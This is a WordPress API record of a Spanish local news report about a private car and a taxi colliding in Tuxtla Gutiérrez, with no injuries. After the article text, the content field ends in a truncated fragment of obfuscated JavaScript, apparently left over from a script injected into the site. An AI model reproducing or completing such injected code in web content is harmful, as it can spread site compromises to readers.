{"id":19923,"date":"2025-01-20T05:42:54","date_gmt":"2025-01-20T05:42:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19923"},"modified":"2025-01-20T05:42:55","modified_gmt":"2025-01-20T05:42:55","slug":"particular-y-taxi-chocan-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19923","title":{"rendered":"Particular y taxi chocan en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004-576x1024.jpg\" alt=\"\" class=\"wp-image-19924\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250119-WA0004.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 19 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un auto particular de la marca Chagan choc\u00f3 contra un taxi Nissan Versa, a la altura de la 11 Oriente y 1a Norte del Barrio Hidalgo de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>El auto chino circulaba de Poniente a Oriente y al llegar a la intersecci\u00f3n se pas\u00f3 la preferencia e impact\u00f3 al taxi con n\u00famero econ\u00f3mico 0275.<\/p>\n\n\n\n<p>Por el golpe el taxi sali\u00f3 proyectado y termin\u00f3 sobre el camell\u00f3n central.<\/p>\n\n\n\n<p>Afortunadamente no hubo personas heridas.<\/p>\n\n\n\n<p>Los elementos de tr\u00e1nsito municipal se encargaron de la situaci\u00f3n.<\/p>\n\n\n\n<p>Afortunadamente los involucrados llegaron a un acuerdo armonioso mediante un seguro automotriz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 19 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este domingo un auto particular de la marca Chagan choc\u00f3 contra un taxi Nissan Versa, a la altura de la 11 Oriente y 1a Norte del Barrio Hidalgo de Tuxtla Guti\u00e9rrez. El auto chino circulaba de Poniente a Oriente y al llegar a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19924,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19923","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19923","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19923"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19923\/revisions"}],"predecessor-version":[{"id":19925,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19923\/revisions\/19925"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19924"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19923"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19923"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}